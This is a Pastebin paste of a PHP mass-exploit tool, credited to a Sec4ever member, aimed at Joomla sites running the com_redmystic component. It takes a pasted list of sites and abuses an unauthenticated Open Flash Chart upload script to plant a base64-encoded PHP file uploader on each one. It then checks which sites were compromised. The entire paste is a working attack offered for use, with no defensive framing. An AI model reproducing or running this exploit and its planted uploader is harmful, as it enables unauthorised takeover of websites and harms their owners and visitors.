API tools faq
paste
jackwilder

com_redmystic

jackwilder
Jun 14th, 2015
431
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.31 KB | None | 0 0
raw download clone embed print report
  1. <form method='POST'>
  2. <input type='text' name='name' value='p.php'>
  3. <input type='submit' value='Exploit' name='exploit'><br>
  4. <textarea name='sites' cols='45' rows='15'>Here Sites ;)</textarea>
  5. </form>
  6. <?
  7.     /*
  8.     # Coded By : xSecurity
  9.     # Homepage : sec4ever.com - is-sec.com
  10.     # GreetsTo : b0x - Mr.Dm4r - Lov3rDNS - RAB3OUN - r0kin - Shark Hidden - DeeF - DamaneDz - b0y h4ck - All Sec4ever Member'z
  11.     # Scanning : [ com_civicrm , com_acymailing , com_jnewsletter , com_jinc , com_maianmedia , com_jnews ]
  12.     */
  13.     @set_time_limit(0);
  14.     $site = explode("\r\n", $_POST['sites']);
  15.     $filename = $_POST['name'];
  16.     $path = array('/administrator/components/com_redmystic/chart/ofc-library/ofc_upload_image.php');
  17.    
  18.     $name = array("/administrator/components/com_redmystic/chart/tmp-upload-images/");
  19.    
  20.     $uploader = base64_decode("PD9waHAKZWNobyAnPHRpdGxlPlVwbG9hZCBGaWxlcyB4U2VjdXJpdHkgfCBTZWM0ZXZlci5Db008L3RpdGxlPic7CmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11
  21. bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7CmVjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nOwppZiggJF9QT1NUWydfdXBsJ10gPT0gIlVwbG9hZCIgKSB7CglpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcGxvYWQgQ29tcGxhdGUgISEhPC9iPjxicj48YnI+JzsgfQoJZWxzZSB7IGVjaG8gJzxiPlVwbG9hZCBGYWlsZWQgISEhPC9iPjxicj48YnI+JzsgfQp9Cj8+");
  22.    
  23.     $options = array('http' => array('method'=> "POST",'header'=> "Content-type: text/plain\r\n", 'content'=> $uploader));
  24.     $context = stream_context_create($options);
  25.    
  26.     if($_POST['exploit'])
  27.     {
  28.         foreach($site as $sites)
  29.         {
  30.             foreach($path as $upload)
  31.             {
  32.                 $fopen = @fopen("{$sites}{$upload}?name={$filename}", 'r', false, $context);
  33.             }
  34.             foreach($name as $names)
  35.             {
  36.                 $url = "{$sites}{$names}{$filename}";
  37.                 $check = @file_get_contents($url);
  38.                 if(eregi("Sec4ever.CoM", $check))
  39.                 {
  40.                     echo "<font face='Tahoma' size='2'>[+] Exploit Complete => {$sites}/{$names}/{$filename} <br />";
  41.                     flush();
  42.                 }
  43.             }
  44.         }
  45.     }
  46.     echo "<font face='Tahoma' size='2'>[+] Coded By xSecurity => Sec4ever.CoM - is-sec.com <br> 4U : b0x - Mr.Dm4r - Lov3rDNS - RAB3OUN - r0kin - Shark Hidden - DeeF - DamaneDz - b0y h4ck - All Sec4ever Member'z</font>";
  47. ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!